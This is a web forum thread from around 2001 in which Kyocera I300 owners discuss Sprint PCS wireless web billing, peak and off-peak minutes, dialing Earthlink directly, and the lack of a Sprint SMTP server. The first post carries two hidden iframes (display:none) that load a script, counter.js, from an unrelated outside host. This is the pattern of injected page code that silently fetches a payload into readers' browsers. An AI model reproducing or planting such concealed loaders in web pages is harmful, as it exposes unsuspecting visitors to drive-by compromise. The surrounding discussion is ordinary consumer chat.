+ Reply to Thread
Page 1 of 2 1 2 LastLast

Newbie I300/ISP questions

just got my I300. Loving every second of it. An amazing toy.

Question about the internet service though. (I am a newbie, please be patient..)

I have used sprint pcs for a long time, but i'm not signed up for their wireless internet services for web browsing, etc.
    As I understand it, it will cost an additional $0.30 a minute to browse the web with the I300?

I already have another ISP (earthlink) -- would it be better to just have the I300 dial up earthlink, and I could use my 1500 free voice minutes instead of having to use special "internet time"?

Is that even a viable option? If so, has anyone tried it?

thanks for the help; i'm stoked about not having to carry a separate palm & cell phone any longer.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

that won't work.... anytime you use the phone for a "data" call, its billed as wireless web minutes....

Brooks

you can set your I300 to sign on to the internet using your Earthlink account. set the telephone number, user id, and password up just as you would for your computer.

when you are connected you use your plans minutes just as if you were making a phone call. although you do need to have the wireless web option to make data calls. (sprint can tell the differende between data calls and voice)

Wireless Web Minutes???

Are all Wireless Web minutes, no matter what time you log on (i.e. after 9pm and on weekends) automaticallly charged to your ANYTIME minutes first?

I signed up for the 200/2800 with the wireless web for free for the first 3 month deal, but it shows I'm over my ANYTIME minutes already but only if you add my Wireless Web minutes to it??? But most of the internet usuage were at night...???

I used to belong to Verizon, so I have know idea how Sprint manages their minutes and I can't find any "fine" print to confirm..

Thnx in advance,
    Mark

I don't believe so. I think airtime is airtime and essentially that is what you are being charged for. Sort of like if you use a calling card to dial long distance from your mobile. Still charged the access fee. At the minimum it will be deducted to the respective set of minutes.

smartphonecentral.com
    I'm with you, mjorange. Sprint pulls my voice and wireless Web minutes from the same bucket. (I'm using my NeoPoint 1000, as I don't have an i300 yet, but I wouldn't expect that to change.)

Why would someone enter their own ISP info instead of using Sprint's access? Unless it aids in using the phone as a wireless modem of sorts with a laptop or something, I'm not understanding that side of things.

Hmm... Based on your responses, I guess I'll have to give Sprint a call then to see what the deal is...

I've only used 94 of 200 ANYTIME minutes, but it's showing me I'm over by about 10minutes. Which coincidently (or not) perfectly adds up if you add ALL my wireless web minutes used (when most of them were used at nights and weekends).

Thnx,
    Mark

P.S. My post was seperate to the first couple of posts, but this was the only existing message that was sort of the same topic.

Administrator

Arrow

no need to call them.. we can answer all of your q's...

simply put,

if you use your phone during peak times, be it data or voice, your minutes will come out of that.. if you use your phone during off peak, be it data or voice, you will use your off peak minutes...

Originally posted by wHo_tHe

Why would someone enter their own ISP info instead of using Sprint's access? Unless it aids in using the phone as a wireless modem of sorts with a laptop or something, I'm not understanding that side of things.
    There are several reasons someone may want to dial their own ISP rather than Sprints. For one, as far as I know, sprint does not provide an SMTP server to use with POP3/SMTP mail clients. I know several people were using Verizons for a while, but I guess they shut that down to Sprint users. It was probably more or a problem as an open relay rather than Sprint users using it. Most ISPs provide an SMTP server to use to send mail thru, and base the use of it on the IP address you assigned by the DHCP server. So if you dial Sprint and want to send mail via Earthlink SMTP server, you are out of luck... but if you dial Earthlink directly, then you can use their SMTP server.

The same can be said for some Intranet sights. I dial several RAS servers with my i300 so I can connect to internal networks of my clients or my network at the office. They also can act as an internet gateway for me.

Generally I use the Sprint "enhanced" network connection thought. It generally connects the quickest. I have my own SMTP server to send mail thru (authenticaed protected). But there are reasons to dial another ISP. Hope that clarifies the question.

Carl

the above post is correct. you can dial into Earthlkinks server just as you would on a home PC, and this would alow you to send emails via SMTP. (this is how i did it for some time), but there is a major problem!!!! I'm sure many of you have noticed how you don't always connect to the internet on the first attempt. well if you use Sprint's dial up you don't actually start getting charged minutes until you "sign-in". so if you try 10 time you will not get charged 10 minutes. With Earthilink you are charged as soon as your phone connects to Earthklinks server wheather you sign-in or not (basically the same as a phone call). so if you try to connect 10 times on earthlink with no success you will be charged 10 minutes.

so if you access the internet via earthlink on a daily basis, with maybe 5 attempts per day you will rack up 150 extra minutes per month.

Nick:
    So what do you do now for an SMTP server? I can not believe that Sprint does not provide an SMTP server for its customers to use. Verizon does.
    cjg

smartphonecentral.com
    Thanks. The SMTP issue is a real one. I'm glad my domain uses SMTP authentication rather than reverse DNS. Thanks again!

well, i am still trying to figure that one out!!! the optimal solution would be for sprint to allow us to access their SMTP, but as of now the only solution i have found involves paying a fee to a thierd party to allow you access to their SMTP server, and I feel that i should not have to pay a third party to send my emails since i pay Sprint PCS and Earthlink every month for email service. I feel sprint should allow me access to their SMTP.

If anyone has a solution other than using my home PC as a SMTP server (see link ), please drop me an email and let me know.

nickstanfa@hotmail.com

Thanks for all your help.

Mark what Marc says is true. Are you certain of your phone usage and further exactly when peak and off peak times are? I spoke to a Sprint rep last night and certainly web minutes are deducted from the respective set of minutes.

Heres a question: Say you make a call or start wireless web 10 minutes before off peak begins. Once the call continues into off peak, do the minutes continue towards peak or swith to off peak?

Maybe I should just get the 10,000 minutes!

Nick:
    I feel your pain. I have my own SMTP server, but we authenticate to it. Not sure why the ISPs don't let you do that. Come on Sprint (if you are listening), this should be your responsibility, you ARE the ISP here, provide an SMTP server for YOUR customers to use. Youd' think they GIVE us the DAMN service.
    ..... sorry, lost my head for a sec.
    Carl

Does Sprint REALLY have a 10000 minute plan? I have a 4000 minute plan, for $149. How much for the 10K plan. With that I can drop my office and home phone.
    Carl

Administrator

Arrow

thats why i always wait until atleast 10 minutes after off peak begins to use my off peak minutes...

if you are using your peak minutes in a call and you run into the off peak.. you are still using the peak minutes, and vice versa... only when you disconnect and then reconect a call will you switch into off peak.. and if you were to do that.. i would suggest you wait 5 minutes so the system can "update" your account into off peak... :p

Administrator
    Originally posted by CarlGalgano
    Does Sprint REALLY have a 10000 minute plan? I have a 4000 minute plan, for $149. How much for the 10K plan. With that I can drop my office and home phone.
    Carl
    HA! i was going to get that very same plan, but i got the 10,000 minute plan.. for ... you guessed it... $149.00!!!! so i pay the same as you carl but i have 6000 more minutes to boot...

but there is a catch...

off peak starts at 9 instead of 8... but with 2k minutes duiring the day (and 8k off peak) , i dont fret....
    Last edited by Marctronixx; 12-20-2001 at 01:03 PM.

Regarding my minute usage, I contacted Sprint and figured it out...

Bottom line is I was looking at the wrong 'numbers' and I am just over my ANYTIME minutes limit.

Basically the "Account Usage" screen clearly shows the "voice" minutes but the Wireless Minutes are recorded/displayed separately and not 'clearly' specified as "Web Minutes ANYTIME" or "Web Minutes Off-Peak" or a Sum/Total of all minutes used etc.

I think it's unclear like this at first on purpose to persuade you to change to a "higher" plan with more minutes... I almost did too, but I'll give the 200/2800 plan one more month before change...

Thnx,
    Mark

P.S. I too also wait at least 5min. after 9pm to make sure, just in case Sprint is on "Bar Time"...

i use my I300 to dial into my university ISP. it took some time to figure out how to adjust the settings, but it works perfectly. i thought i read somewhere in teh documentation that the intenal modem is 56K, but i always connect at only 14.4. the advantage of using another ISP over sprint is that you can use the color browswer with images (you are not limited to text-only as with the sprint browser). however, the sprint browswer is good for quick lookups of text-based info (like scores, weather, etc).

by the way, has anyone noticed that the voicemail timestamp is always different that the network time that shows on your phone's display? I always noticed that I will get a voicemail at 4:30pm for example, and when i check the voicemail at exactly 4:30, the timestamp said i received the message at 4:33pm!